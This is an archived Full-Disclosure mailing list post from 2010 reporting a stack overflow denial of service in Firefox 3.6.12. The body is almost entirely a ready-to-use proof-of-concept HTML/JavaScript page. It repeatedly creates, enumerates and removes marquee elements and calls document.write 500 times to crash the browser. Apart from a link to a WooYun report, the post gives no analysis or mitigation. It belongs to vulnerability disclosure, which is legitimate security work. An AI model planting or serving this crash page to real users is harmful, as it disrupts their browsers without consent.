lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 8 Dec 2010 16:28:41 +0800
From: sec yun <root@...yun.org>
To: full-disclosure@...ts.grok.org.uk
Subject: FireFox 3.6.12 Stack Overflow Denial of Service

<code>
<html>

<body></body>

<script type="text/javascript">

function xxoo(){

var str="marquee";

var cobj=document.createElement(str);

cobj.id="bK";

document.body.appendChild(cobj);

var obj=document.getElementById("bK");

var atts = new Array();

for(p in obj){



}

document.body.removeChild(cobj);

var html="<marquee>";

document.write(html);

}

for (i = 0; i < 500; i++) {

xxoo();

}

</script>
</code>

 http://www.wooyun.org/bugs/wooyun-2010-0903

WooYun is a connection platform for vendors and security researchers
 From 0x250@...yun :)

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ